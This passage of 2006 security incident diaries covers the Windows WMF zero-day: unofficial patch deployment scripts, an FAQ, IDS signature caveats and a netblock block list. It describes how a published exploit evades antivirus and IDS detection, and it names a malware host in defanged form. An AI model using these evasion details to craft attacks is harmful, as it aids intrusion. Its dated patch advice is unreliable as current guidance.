services (SMTP or HTTP) at strategic locations.
3) If you have multiple locations, consider the action plan of
disconnecting internal WAN pipes to minimize damage to other parts of
your organization.
4) Disconnect internal and/or external e-mail servers to prevent further
5) If you plan to perform any of the above actions, then you should also
plan on how to bring these sites/services back online.
6) Determine an action plan for local workstation admins.  How are they
going to receive virus updates and virus removal tools to clean

You should take this time to validate that you have good backups of your
e-mail servers.  If things go really badly, you may be restoring from
backup.  You should also make sure that everyone that could be involved
in the incident response has an updated contact list (cell phones,
pagers, home phones, etc) for all of the appropriate operational
personnel.  Remember that some of these communication methods may fail
during a virus outbreak.  Finally, you should identify secondary
Internet access (maybe dial-up) to download virus updates, IDS/IPS
updates, or get latest news about the event.

In a virus outbreak/worm event, communication between the operational
folks and management is critical.  Make sure that there is a clear
understanding of when/how to shut-off services and when/how to turn them
back on.  Communication to end-users is also critical and you may want
to start informing them now that the next 6-10 days could be very
difficult times.

You can find much more information about incident response plans at the
following sites:



Published: 2006-01-04

Ilfak Guilfanov's website, Hexblog.com back again

As you probably noticed, Ilfak Guilfanov's website, Hexblog.com, has been suspended. We presume that the main reason for this are bandwidth issues; we'll let you know if that's not the case (hopefully there were no evil intentions behind this).

In the mean time, if you need the unofficial patch, you can download it from our website. The link was posted in a previous story, here.


Ilfak's site is back, reduced to the bare minimum as it had very high load. If you still can't reach it's possible that there is some caching between you/your ISP/Ilfak's site.

Thanks to Alexander Hoff for pointing out that, due to changes on Ilfak's site, URLs from old diary entries don't work anymore. You can go to the main web page, http://www.hexblog.com to access Ilfak's files.

Just one more update - if you can't access the site, the main reason is that your DNS server(s) still don't have the updated (new) DNS entries. Ilfak changed IP address of his site so it will take a while for this to propagate.

Ilfak added several other servers - the DNS entries should have propagated changes by now so you should use the domain name (and let DNS servers help with load balancing).


Published: 2006-01-04

Lotus Notes Vulnerable to WMF 0-Day Exploit

John Herron at NIST.org discovered today that Lotus Notes versions 6.x and higher is vulnerable to the WMF 0-day exploit. In the advisory, located on the NIST website here, John reports that Lotus Notes remained vulerable even after running the regsvr32 workaround in the Microsoft security advisory.

Update December 30, 2005

Our dedicated reader from Finland, Juha-Matti Laurio, has confirmed that IBM is aware of the vulnerability above. He had a couple of recommended workarounds for those using the Lotus Notes (Domino) system. I expect that IBM will be releasing an advisory directly with this information.

"1. Filter all common picture file extensions at the network perimeter.

The following file extensions are recommended:

BMP, DIB, EMF, GIF, ICO, JFIF, JPE, JPEG, JPG, PNG, RLE, TIF, TIFF and WMF, because Microsoft Windows handles picture files by information of the file header information, not by file extension used.

2. Do not Open... or View... picture files from untrusted sources.

Thanks for that information Juha-Matti.

Update January 04, 2006

IBM has released an advisory that states the following:
"Lotus Notes allows users to optionally "View" or "Open" file attachments contained in email messages and documents. These attachments do not auto-launch or execute without user action."  Their recommendation is to follow the recommendations from Microsoft and apply the patch when available.  http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21227004

Scott Fendley
Handler on Duty


Published: 2006-01-03

WMF: patches and workarounds explained

We continue to get many questions on the WMF vulnerability, and are trying to explain it a bit more graphically.

Feel free to use the presentations below to explain why you need to use the unofficial patch or how it works on a high level.
To help you answer the "kill" questions:
  • You might not have seen exploits yet because:
    • You are lucky so far: estimates are that up to now 10% of our readers have seen them.
    • The bad guys haven't released their worst (yet), but we know they have the tools and means to create it and we expect them to do so well enough before the official patches are released next week.
    • The detection might be insufficient or might be failing, so you would not know it.
      (esp. if the attack was subtle enough in a first phase, it can be very hard to detect as it's designed to be very hard to detect by anti-virus and IDS/IPS systems)
    • We were told of McAfee reporting a 6% infection rate at their customers on New Year's Eve already.
But when you will see the exploits, it will be too late. So act now and be prepared for the coming storm.
  • The Internet Storm Center knows of quite a few goverment and larger organisations that did roll-out the unofficial patch, so your "peers" might very well be doing the right thing already.
  • The usual precautions, such as telling the users not to click or surf to bad sites, updating anti-virus signatures, filtering email, ... will help just like a drop of water helps to fill a bucket. It's just not good enough by far.
    • No user interaction is required. This is one of those where the user is a sitting duck, not the offender.
    • Many anti-virus signatures still trigger on the payload, not on the call in the WMF and therefore might get a working signature only after you got hit. This can be more painful if you are unlucky to get hit early.
    • IDS/IPS can be easily bypassed by using off-the-shell tools already available to the bad guys.
    • Firewalls will not prevent filesharing once the files are inside.
    • ...

In addition to this, please do make the difference between a vulnerability and the lack of an exploit.
  • One working exploit proves a vulnerability.
  • Many non-functional exploits prove nothing towards the lack of a vulnerability.

Swa Frantzen


Published: 2006-01-03


"Although the issue is serious and malicious attacks are being attempted, Microsoft's intelligence sources indicate that the scope of the attacks are not widespread."
- Microsoft Security Advisory (912840)

"...Microsoft's intelligence sources..."?!?

Go ahead and laugh.  I'll wait.

Through?  O.K.

While all of the rest of us were sleeping, it appears that the propeller-heads working on Billy Wonka's Official Microsoft Research and Development Team have been hard at work creating a crystal ball capable of foretelling the future.  The only problem: it appears that they made it from rose-colored crystal.

In their rosy vision of the future, over the next seven days, nothing bad is going to happen.  The fact that there are point-n-click toolz to build malicious WMFs chock full o' whatever badness the kiddiez can cook up doesn't exist in that future.  The merry, lil' Redmond Oompa Loompas are chanting "Our patch isn't ready / you have to wait / so keep antivirus / up-to-date" which makes perfectly accurate, current AV signatures appear on every Windows computer - even those with no antivirus software.

The future, according to Microsoft, is a wonderful, safe, chocolaty place.

And why not?  Everything just seems to work out for them!

Imagine!  You have tons and tons of work to do!  Even now, the Oompa Loompas are hard at work out in Redmond, simultaneously regression-testing and translating Microsoft's WMF patch into Swahili and Urdu.  And, somehow, as if by magic, all of this work will wind down at precisely the right moment so that the WMF patch doesn't have to be released "out of cycle."  How convenient!  Especially if you're wanting to avoid all of that nasty "Microsoft Releases Emergency Patch" publicity.

And remember, if something bad does happen to you during the next seven days, Billy Wonka and his Magic Metafiles aren't to blame.  You are!

"Customers who follow safe browsing best practices are not likely to be compromised by any exploitation of the WMF vulnerability. Users should take care not to visit unfamiliar or un-trusted Web sites that could potentially host the malicious code."

Why are you visiting places on the web you've never been before?  Restrict your browsing to safe places, and everything will be just fine.  'Cause no one could ever put a bad graphic file on a place you trust.

Tom Liston - Intelguardians Network Intelligence, L.L.C.


Published: 2006-01-03

.MSI installer file for WMF flaw available

For all of you corporate folk out there, we now have a .msi installer file available for version 1.4 of Ilfak Guilfanov's unofficial patch for the Windows .WMF flaw.  A very big "thank you" goes out to Evan Anderson of Wellbury Information Services, L.L.C. for his diligent efforts to get this put together.  Note:  Like Mr. Guilfanov's original patch, this will dump out not only Guilfanov's source code, but also the code that Evan wrote to do the install from within the .msi.  Note also:  We have reverse engineered and verified that the installation/uninstallation code in the .msi does what it says it does and nothing more.  The wmfhotfix.dll installed is the binary equivalent of the previously vetted version 1.4.

WMFHotfix-1.1.14.msi has an MD5 of 0dd56dac6b932ee7abf2d65ec34c5bec
A pgp signature using the SANS ISC key is available as well.


Published: 2006-01-03

MS to Release Update on Jan 10

Microsoft updated its advisory (KB 912840) this morning with the below information.  For those in academic environments, this may actually work in your favor as students will be coming back after the supposed release date. 

For corporate environments, IT Staffers are going to have to make a risk assessment.  What would be cost to your company if you are compromised between now and January 10 if the update is released as mentioned?  Can you really afford to do nothing?  Are you willing to gamble that unregistering the dll is sufficient or do you go with defense in depth and apply the unofficial patch?   You make the choice.

'Microsoft has completed development of the security update for the vulnerability. The security update is now being localized and tested to ensure quality and application compatibility. Microsoft's goal is to release the update on Tuesday, January 10, 2006, as part of its monthly release of security bulletins. This release is predicated on successful completion of quality testing.

The update will be released worldwide simultaneously in 23 languages for all affected versions of Windows once it passes a series of rigorous testing procedures. It will be available on Microsoft's Download Center, as well as through Microsoft Update and Windows Update. Customers who use Windows' Automatic Updates feature will be delivered the fix automatically.

Based on strong customer feedback, all Microsoft's security updates must pass a series of quality tests, including testing by third parties, to assure customers that they can be deployed effectively in all languages and for all versions of the Windows platform with minimum down time.

Microsoft has been carefully monitoring the attempted exploitation of the WMF vulnerability since it became public last week, through its own forensic capabilities and through partnerships within the industry and law enforcement. Although the issue is serious and malicious attacks are being attempted, Microsoft's intelligence sources indicate that the scope of the attacks are not widespread."


Published: 2006-01-02

Scripting the Unofficial .wmf Patch

Brent Hughes sent us a script that he used today to push the unofficial .wmf patch across his enterprise.  Here is what he sent us, and I suspect that it will work nicely with the updated patch from Ilfak.  Note that our html editor sometimes eats backslashes, apologies if that happens below.

I put the patches in netlogon to help distribute the load a bit across the domain controllers.  Here's just the relevent section of my script (in vbscript).  It assumes the patch always installs in c:program files.  If program files is somewhere else you might have to find it [ie. progdir = objShell.ExpandEnvironmentStrings("%programfiles%")].  

Const HOTFIXDIR = "%home%\netlogon\patches"

set objShell = CreateObject("Wscript.shell") Set oFSO = CreateObject("Scripting.FileSystemObject")

if NOT oFSO.FileExists("c:program files\Windows\MetafileFix\wmfhotfix.cpp") then
    objShell.Popup "Installing WMF unofficial patch", 5
    objShell.Run "%windir%\system32\regsvr32.exe -u %windir%\system32\shimgvw.dll"
    objShell.Run HOTFIXDIR & "wmffix_hexblog13.exe /VERYSILENT /SUPPRESSMSGBOXES"
end if

You could batch file it too (though I've never tried this in group
@echo off
if exist "c:program files\windows\metafilefix\wmfhotfix.cpp" goto end
    %windir%\system32\regsvr32.exe -u %windir%\system32\shimgvw.dll
     %home%\netlogon\patches\wmffix_hexblog13.exe /VERYSILENT /SUPPRESSMSGBOXES

Put one of those in a group policy under shutdown scripts and it should patch on reboot.  I'm still working on the best way to script rebooting the network, but I'll send that too when I've got it.



Published: 2006-01-02

VMWare Browser

In all of the confusion over the .wmf issue comes a bit of hope from one of our favorite vendors.  VMWare has a Browser Appliance virtual machine available for free download.  It's a BIG file (258Mb zipped) so be sure you have a plenty of time for downloading.  The appliance can be run in either VMWare Workstation or the free VMWare Player and provides you with a safer environment for web surfing.  Thanks to John Holmblad for pointing this out to us. 

(Be sure that you are running the latest version of VMWare Workstation, since there was a security issue disclosed several days ago.  Also, note that the VMWare Player installion process asks if you want to install the Google desktop search application, which should remind you of yet another vector for the .wmf vulnerability to manifest itself.)

UPDATE - two more sandbox approaches to browsing were sent to us.  Morland Halliday said to check out www.greenborder.com, and Derrill Guilbert pointed us to www.sandboxie.com.  Thanks to both of you!


Published: 2006-01-02

Checking for .wmf Vulnerabilities

As far as we know there are no tools available yet for remote scanning and detection of systems vulnerable to the .wmf issue.  Ilfak Guilfanov has a testing tool available on his website, and he cautions users that it only checks for one version of the exploit so it might not detect new variations. 

If you want to experiment with another file submitted to us by Kevin Gennuso (thanks, Kevin) you can download it here.  The file will open calc.exe and kill explorer.exe on vulnerable systems but otherwise causes no damage as far as we can tell.  As always, test this file before using it on a production or enterprise computer.  This file is useful for seeing if Ilfak's patch worked for your system.

Reik Bohne sent us a link to a test on heise.de.  It's in German but essentially what it does is provides you with a way to check your browser and your email client to see if you are vulnerable.  Like the file above, it starts calc.exe on an unpatched system.


Published: 2006-01-02

.wmf FAQ Translations

Thanks to the work of several of our handlers and readers, we've got a nice set of FAQs in multiple languages:

Italiana and Italiana
Portugues - Br

More coming as they are submitted to us.


Published: 2006-01-02

Installing a Patch Silently

For those who are manually patching systems using Ilfak Guilfanov's unofficial patch, handler Tom Liston says that you can install it in an unattended mode by using this incantation:


More details are here.  We do not have a working .msi version and am actively seeking help from anybody who can get one working.  This will make life a whole lot easier for enterprise administrators.  Unfortunately the above command will not work pleasantly in a GPO startup script, since a reboot is required for it to take effect.  After the reboot, it will try to install again which will create an annoying error message to users. 

A reminder:  be sure to test the patch above before deploying it across an enterprise.  While the handlers (including me) are running it on our own personal systems and it works as advertised, we can't vouch for any special software you might have in your own systems that could be disabled after the patch is installed.


Published: 2006-01-02

More .wmf Woes

The WMF issue continues to spin.  Overnight we received a note from HD Moore at Metasploit:

We released a new version of the metasploit framework module  for the WMF flaw, this one uses some header padding tricks and gzip encoding to bypass all known IDS signatures. Consider this "irresponsible" if you like, but it clearly demonstrates that a run-of-the-mill signature-based IDS (or A/V) is not going to work for this flaw. If anyone has any questions about why we are releasing these types of modules so early after the disclosure, feel free to drop me an email.



While many might disagree with what Moore and others are doing in the Metasploit project, be grateful that their efforts are "open" and available for both defenders and attackers to view.  If only the bad guys had the tools then the good guys would be left guessing on how this stuff works.  This reminds me of how bad we felt in the early 1990s when Satan was released.  We (the good guys) felt that they (the bad guys) had a tool that was "unfair" in that it allowed them to scan our networks looking for flaws.  Today of course no sysadmin worth his or her GIAC certification would run a network without scanning periodically for vulnerable systems.  So, if you haven't looked at the Metasploit project then today might be the day you should.  Think of it as a defender's best friend rather than an evil hacking tool.


Published: 2006-01-01

Updated version of Ilfak Guilfanov's patch

Ilfak Guilfanov has released an updated version of his unofficial patch for the Window's WMF issue.  We have reverse engineered, reviewed, and vetted the version here. Note: If you've already successfully installed the patch, this new version adds nothing new.  It only adds code to make it able to install on some other very specific configurations and code to recognize when the patch has already been installed.

MD5: 14d8c937d97572deb9cb07297a87e62a - wmffix_hexblog13.exe



Published: 2006-01-01

2nd generation WMF exploit: status of the anti-virus products after one day.

Yesterday in a colaborative effort, we sent a true 0-day sample of the 2nd generation WMF exploit to virustotal. As expected, no detections were made. The payload in that sample was a very basic, commonly known and available payload. So the payload might get detected without the exploit being detected. But even there, we had no such luck then.

We sent in a similar sample today.

The results are not all that good:
eTrust-Vet 01.01.2006 Win32/Worfo
McAfee 4664 01.01.2006 Exploit-WMF
Symantec 8.0 01.01.2006 Backdoor.Trojan

All the others failed to detect the sample.

Do note that the Symantec detect is most likely on the payload. That payload isn't what any of the bad guys playing with this will insert. They will insert far nastier and far less off-the-shelf stuff than what we did.

So for now you still have the best chance with following the advice in this diary entry.

Swa Frantzen


Published: 2006-01-01

Recommended Block List

I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:

InterCage Inc.: ( -
Inhoster: ( -

The list may be updated later. We do not expect to make this a "regular feature". But at this time we find that it is necessary to point out these particular two netblocks.

They have been associated with a number of high profile criminal activities in the past. A good number of WMF exploits use name servers or other resources in these netblocks. They have been non responsive to current and past requests to remove malicious content.


Published: 2006-01-01

Trustworthy Computing

Looking forward to the week ahead, I find myself in the very peculiar position of having to say something that I don't believe has ever been said here in the Handler's diary before: "Please, trust us."

I've written more than a few diaries, and I've often been silly or said funny things, but now, I'm being as straightforward and honest as I can possibly be: the Microsoft WMF vulnerability is bad.  It is very, very bad.

We've received many emails from people saying that no one in a corporate environment will find using an unofficial patch acceptable.

Acceptable or not, folks, you have to trust someone in this situation.

To the best of my knowledge, over the past 5 years, this rag-tag group of volunteers hasn't asked for your trust: we've earned it.  Now we're going to expend some of that hard-earned trust:

This is a bad situation that will only get worse.  The very best response that our collective wisdom can create is contained in this advice - unregister shimgvw.dll and use the unofficial patch.  You need to trust us.

Looking back over the past year, the ISC handlers have faced up to any number of challenges: from worms and viruses to DNS poisoning and hurricanes.  We've done our best to keep you informed and to tell it like it is.  Somehow, it seems fitting that on the last day of 2005 we rang in the New Year in what can only be described as typical ISC style.

On December 31st, we received word that a "new and improved" version of the WMF exploit had been published.  This new exploit code generated WMF files that were sufficiently different that they bypassed nearly all AV and IDS signatures.  Publishing exploit code such as this for an unpatched vulnerability on a holiday weekend is, without any doubt, a totally irresponsible act.

And so, as the hours to the New Year slowly counted down, a group of volunteers gave up their holiday weekend to come together as a team and put their collective knowledge and intellect to work on the problems this reckless disclosure created.  Some tested the exploit, some talked to AV vendors, some worked toward finding a means to mitigate the vulnerability, some tested "fix" ideas and the resulting patches.

I was privileged to be a part of that team, and I'm incredibly proud of everyone who participated.  As it became obvious that the "fix" that we were working toward was essentially what had already been created by Ilfak Guilfanov, we wrote to him to ask if we could redistribute his patch from the ISC.  He was incredibly gracious and courteous in allowing us to do so and we were able to work with him to verify several changes that allowed the patch to work on a wider variety of Windows systems.

We have very carefully scrutinized this patch.  It does only what is advertised, it is reversible, and, in our opinion, it is both safe and effective.

The word from Redmond isn't encouraging.  We've heard nothing to indicate that we're going to see anything from Microsoft before January 9th. 

The upshot is this: You cannot wait for the official MS patch, you cannot block this one at the border, and you cannot leave your systems unprotected.

It's time for some real trustworthy computing.  All we're asking is if we've proved ourselves to be worthy of your trust.


Published: 2006-01-01

2nd generation WMF 0day Exploit Spammed

According to F-Secure's blog today, the 2nd generation WMF exploit has been spammed and "When the HappyNewYear.jpg hits the hard drive and is accessed (file opened, folder viewed, file indexed by Google Desktop), it executes and downloads a Bifrose backdoor (detected by us as Backdoor.Win32.Bifrose.kt) from www[dot]ritztours.com."

Trend Micro is calling it TROJ_NASCENE.H


Published: 2006-01-01


  • Why is this issue so important?
The WMF vulnerability uses images (WMF images) to execute arbitrary code. It will execute just by viewing the image. In most cases, you don't have click anything. Even images stored on your system may cause the exploit to be triggered if it is indexed by some indexing software. Viewing a directory in Explorer with 'Icon size' images will cause the exploit to be triggered as well.
  • Is it better to use Firefox vs. Internet Explorer?
Internet explorer will view the image without warning. New versions of Firefox will prompt you before opening the image. However, this will offer little protection given that these are images frequently considered as 'safe'.
  • What versions of Windows are affected?
All. Windows 2000, Windows XP, (SP1 and SP2), Windows 2003. All are affected to some extend. Mac OS-X, Unix or BSD is not affected.
  • What can I do to protect myself?
Microsoft has not yet released a patch. An unofficial patch was made available by Ilfak Guilfanov. Our own Tom Liston reviewed the patch and we tested it. The reviewed and tested version is available here (MD5: 99b27206824d9f128af6aa1cc2ad05bc). THANKS to Ilfak Guilfanov for providing the patch!!
You can unregister the related DLL (shimgvw.dll).
Virus checkers provide some protection.

Our current "best practice" recommendation is to both unregister the DLL and to use the unofficial patch.
  • Will unregistering the DLL protect me?
It might help. But it is not foolproof. We want to be very clear on this: we have some very stong indications that simply unregistering the shimgvw.dll isn't always successful. The .dll can be re-registered by other processes, and there may be issues where re-registering the .dll on a running system that has had an exploit to succeed. In addition it seems there might be issues in the gdi32.dll which cannot be unregistered all that easy.
  • Should I just delete the DLL?
Not a bad idea. But Windows File Protection may replace it. You have to turn off Windows File Protection first. Also, once an official patch is available you will need to replace the DLL. (renaming it is probably better so you have it handy).
  • Should I just block all .WMF images?
This may help, but it is not sufficient. WMF files are recognized by a special header and the extension is not needed. The files could arrive using any extension, or embeded in Word or other documents.
  • What is DEP (Data Execution Protection) and how does it help me?
With Windows XP SP2, Microsoft introduced DEP. It protects against a wide range of exploits, by preventing the execution of 'data segements'. However, to work well, it requires hardware support. Some CPUs, like AMD's 64 Bit CPUs, will provide full DEP protection and will prevent the exploit.
  • How good are Anti Virus products to prevent the exploit?
At this point, we are aware of versions of the exploit that will not be detected by antivirus engines. We hope they will catch up soon. But it will be a hard battle to catch all versions of the exploit. Up to date AV systems are necessary but likely not sufficient.
  • How could a malicious WMF file enter my system?
There are too many methods to mention them all. E-mail attachments, web sites, instant messaging are probably the most likely sources. Don't forget P2P file sharing and other sources.
  • Is it sufficient to tell my users not to visit untrusted web sites?
No. It helps, but its likely not sufficient. We had at least one widely trusted web site (knoppix-std.org) which was compromissed. As part of the compromisse, a frame was added to the site redirecting users to a corrupt WMF file. "Tursted" sites have been used like this in the past.
  • What is the actual problem with WMF images here?
WMF images are a bit different then most other images. Instead of just containing simple 'this pixel has that color' information, WMF images can call external procedures. One of these procedure calls can be used to execute the code.
  • Should I use something like "dropmyrights" to lower the impact of an exploit.
By all means yes. Also, do not run as an administrator level users for every day work. However, this will only limit the impact of the exploit, and not prevent it. Also: Web browsing is only one way to trigger the exploit. If the image is left behind on your system, and later viewed by an administrator, you may get 'hit'.
  • Are my servers vulnerable?
maybe... do you allow the uploading of images? email? Are these images indexed? Do you sometimes use a web browser on the server? In short: If someone can get a image to your server, and if the vulnerable DLL may look at it, your server may very well be vulnerable.
  • What can I do at my perimeter / firewall to protect my network?
Not much. A proxy server that strips all images from web sites? Probably wont  go over well with your users. At least block .WMF images (see above about extensions...). If your proxy has some kind of virus checker, it may catch it. Same for mail servers. The less you allow your users to initiate outbound connections, the better. Close monitoring of user workstations may provide a hint if a work station is infected.
  • Can I use an IDS to detect the exploit?
Most IDS vendors are working on signatures. Contact your vendor for details. Bleedingsnort.org is providing some continuosly improving signatures for snort users.
  • If I get hit by the exploit, what can I do?
Not much :-(. It very much depends on the exact exploit you are hit with. Most of them will download additional components. It can be very hard, or even impossible, to find all the pieces. Microsoft offers free support for issues like that at 866-727-2389 (866 PC SAFETY).
  • Does Microsoft have information available ?
But there is no patch at the time of this writing.


Published: 2006-01-01

Overview of the WMF related articles at the ISC

Since this is one of the more complex stories to follow I've made a quick overview of the WMF issues.

The first story on the WMF vulnerability and the initial exploit

The update explaining why we went to yellow the first time around

The story pointing to the Microsoft bulletin

The availability of the first snort sigs

The going back to green article

More WMF signatures

Lotus notes affected

The bandaid post: deregistering not reliable, extension filtering not enough

The free phone number for micrsoft support

Indexing and WMF

Musings on how to protect organisations beyond the trivial

An IM worm found using the WMF stuff

The second exploit, back to yellow, new sigatures and an unoffical patch


Swa Frantzen


Published: 2006-01-01

* New exploit released for the WMF vulnerability - YELLOW

New exploit

On New Year's eve the defenders got a 'nice' present from the full disclosure community.

The source code claims to be made by the folks at metasploit and xfocus, together with an anonymous source.

Note: We have been able to confirm that this exploit works.  We are in the process of getting information to AV vendors ASAP.
The exploit generates files:
  • with a random size;
  • no .wmf extension, (.jpg), but could be any other image extension actually;
  • a random piece of junk in front of the bad call; carefully crafted to be larger than the MTU on an ethernet network;
  • a number of possible calls to run the exploit are listed in the source;
  • a random trailer
From a number of scans we did through virustotal, we can safely conclude there is currently no anti-virus signature working for it. Similarly it is very unlikely any of the current IDS signatures work for it.

Judging from the source code, it will likely be difficult to develop very effective signatures due to the structures of the WMF files.

Infection rate

McAfee announced on the radio yesterday they saw 6% of their customer having been infected with the previous generation of the WMF exploits. 6% of their customer base is a huge number.


Considering this upsets all defenses people have in place, we voted to go to yellow in order to warn the good guys out there they need to review their defenses.

We hate going back to yellow for something we were yellow on a couple of days ago and had returned to green, but the more we look at it and the uglier it gets.

UNofficial patch

We want to be very clear on this:  we have some very strong indications that simply un-registering the shimgvw.dll isn't always successful.  The .dll can be re-registered by other processes, and there may be issues where re-registering the .dll on a running system that has had an exploit attempted against it will cause the exploit to succeed.

For those of you wanting to try an unofficial patch with all the risks involved, please see here.
Initially it was only for Windows XP SP2.  Fellow handler Tom Liston worked with Ilfak Guilfanov to help confirm some information required to extend it to cover Windows XP SP1 and Windows 2000.

Note: I've taken this thing apart and looked at it very, VERY closely.  It does exactly what it advertises and nothing more. The wmfhotfix.dll will be injected into any process loading user32.dll.  It then will then patch (in memory) gdi32.dll's Escape() function so that it ignores any call using the SETABORTPROC (ie. 0x09) parameter.  This should allow for Windows to display WMF files normally while still blocking the exploit.  I want to give a HUGE thanks to Ilfak Guilfanov for building this and for allowing us to host and distribute it. (TL)

Note #2: When MS comes out with a real patch, simply uninstall this from Add/Remove programs on the Control Panel.  Mr. Guilfanov did a great job with this...  (TL)

Patching with unofficial patches is very risky business, this comes without any guarantees of any kind.
Please do back out these unofficial patches before applying official patches from Microsoft.

Snort signatures

We are receiving signatures from Frank Knobbe that detect this newest variant, but we haven't done much testing for false positives or negatives at this point.

Frank also restated some warnings:

There is one important note in regards to ALL published signatures including this one. All these signatures will fail to detect the  exploits when the http_inspect preprocessor is enabled with default settings. By default, the flow_depth of the preprocessor is 300 which is  too short to cover the whole exploit. Should the exploit be transmitted on port 80 and http_inspect is enabled, no alert will occur. Note that it will still alert on any ports (using the all port sig below) that are not configured in http_inspect (ie FTP).
One solution is to add the statement "flow_depth 0" to the http_inspect preprocessor. This will tell the preprocessor not to truncate the reassembled pseudo-packet, but it will have an adverse impact on performance. On busy networks, this will lead to 100% CPU utilization of the Snort process and major packet drops.
So we're between a rock, a solid surface, and a hard place. The exploits are web based, yet the signature will fail with http_inspect enabled. With it disabled, Snort will miss all rules containing uricontent and pcre/U statements. With it enabled, and flow_depth set to 0, Snort will alert on the exploit, but also process all uricontent rules in such a fashion that its CPU utilization is skyrocketing.
The only viable solution at this point is to run two instances of Snort. One with your normal set of rules and http_inspect enabled with either the default or "sane" values for flow_depth. The second instance should run with http_inspect disabled or flow_depth set to 0, and process only rules that have to cover a larger than 300 byte area for content matches on ports configured in http_inspect. This two-pronged approach assures that Snorts performance is kept at normal levels, preventing packet loss.

Wishing all windows machines a happy New Year, with a bit fewer nasty exploits.

Swa Frantzen


Published: 2006-01-01

From extreme to in depth

Warning: some might get offended by some of the initial thoughts in this story. Please read till the end before you vent the frustration.

I'm also not trying to bash on Microsoft. If I were I'd have borrowed a subject of some spam message I got recently: "forget microsoft, get big and hard". I'm just trying to show how you can come from an extreme reasoning to a workable solution to protect those assets that need protection.

Suppose you defend a place that has high to very high security needs and wants to avoid the wmf thing at all cost. Reasons to do this should be based on a risk assessment, but elements that might lead to such extreme conditions might include:
  • No patch in sight from Microsoft
  • Not wanting to infect peers such as customers
  • Not wanting to rely on anti-virus signatures when people are developing versions of the exploit with a highly random nature
  • Not wanting to rely on IDS devices due to the same randomness and the "it's too late already" aspect
Suppose you are basically just not capable of accepting the risk associated with the WMF vulnerability, almost no matter what you break. In such a case you have big avenues to walk:
  • Ban Microsoft products in your environment
    • I told you we were going to start from the extreme viewpoint, so hold your horses.
    • What does it buy?
      • No windows, no windows WMF vulnerability
    • What does it not buy?
      • You still can pass on dangerous payload to others like to your customers.
      • If a single escaped machine remains or a single machine snuck back in, you still might get affected.
  • Ban all communication and/or file exchanges
    • Extreme again isn't it? Moreover it is perceived very hard in a modern world.
    • What does it buy you?
      • You prevent yourself from getting and giving dangerous payload to all peers
    • What does it not buy you?
      • If a single file would sneak in, or be present already, you might still have a major problem
      • You have sacrificed a lot of the availability to gain confidentiality and or integrity
With those extreme paths in mind, think about what it can do for you, which parts can help you in your setup and  with your risk assessment help.

Most of our readers do not have the extreme "at all cost" risk situations.

Most of us have a situation where we have a business, and the business must continue to operate. In such a business however you will identify  -if you look for it- areas that might need more protection and are willing to sacrifice more for that protection than other parts of the same business.  That difference in need for protection is what you can play on to do something.

E.g.: Suppose I know the accounting department was considered sensitive and due to the risk analysis performed, worthy of more extreme measures then other departments.

What could I try to do to use some of the very extreme ideas and build a safer solution for them now and in the next weeks ?
  • Isolate them frmm the rest of the company. Plug a firewall between them and the rest of the internal networks. Disallow all unneeded communication with the rest of the company, making sure their servers are on their new inside.
  • Use advanced networking solutions to prevent (accidental) hookup of unauthorized equipment to the sensitive network. E.g.:
    • Make sure switch ports automatically shut down when try try to learn a second MAC address
    • Assign only DHCP addresses to known MAC addresses
    • Kick unknown MAC addresses into a separate VLAN
    • Use layer 2 measures (such as private VLANs) to prevent client-to-client communication
  • Disallow dangerous usage:
    • Disallow IM
    • Disallow web surfing
    • Disallow email, or strip all attachments from the more secure email server they get access to.
  • Now no surfing, no email, ... etc can be hard on the users and they might have really good arguments to have the functionality back.
    • Build a second less sensitive network on different infrastructure
    • Add machines for those that need the web/email/...
    • Allow them to surf the web (with traditional restrctions) on those "less" secure machines but not on the "sensitive" machines which are to be used exclusively for their sensitive application(s).
    • Be very procedural and build the needed infrastructure if you want to allow transfers between the two environments.
  • The more traditional stuff should not be forgotten, especially not on the more secure side:
    • Take a tough stance on updating Anti-virus signatures
    • Look for unregistering the DLL as per Microsofts suggestion
    • May be consider an unofficial patch from some reputable source
  • Look for other platforms
    • This is hard as training users to switch platforms takes time, and worse applications might not have clients for other platforms that work properly. Still it's one way out of the de-facto monoculture of operating systems and related vulnerabilities. We know from agriculture monoculture has risks. If we want not to accept the risks we need to act on it as well.
  • Look for other strongholds to build
    • If you have more than one sensitive section in you company, build more of these strongholds, do not build larger ones.
    • More smaller ones will contain the spread of infections and the associated risks and costs in clean up better under control.
So basically I'm back to a very in depth security approach that when compared to medieval defenses is the equivalent of not trying to build a city with a huge wall around it, because it's too much of a hassle and too costly. But instead trying to build a city with a somewhat flimsy wooden palisade and build for the few nobles we have a big sturdy donjon to protect them, even at the cost of some discomfort in the process.
Add to that that families of nobles get their own donjon so as not to risk all nobles getting wiped out in one go should disease strike the city.

UPDATE We received some suggestions to help far less extreme than what is above here. However I feel it is hard to actually recommend any of them as the protection it might give has a huge risk of giving a false sense of security. Yet for soem organisations it might be what does the trick for them ...
  • Allowing only non windows machines to acces the Internet was suggested as an approach. While it might protect that machine, the downloaded files might easily migrate to the windows machines and as such be a risk regardless. Also users might find a way to tunnel thtough the allowed machines. But as always it gives something and for some environments it might help to mitigate the risk.
  • Remote display clients from a windows desktop to a unix server was suggested. While it might work again some of the tools have file transfer capabilites and/or accellerate the display by using the graphical power in the workstation. You will never be sure the windows machines are fully secure. But it might help in some environments to mitigate some of the risk without giving much assurances.
Swa Frantzen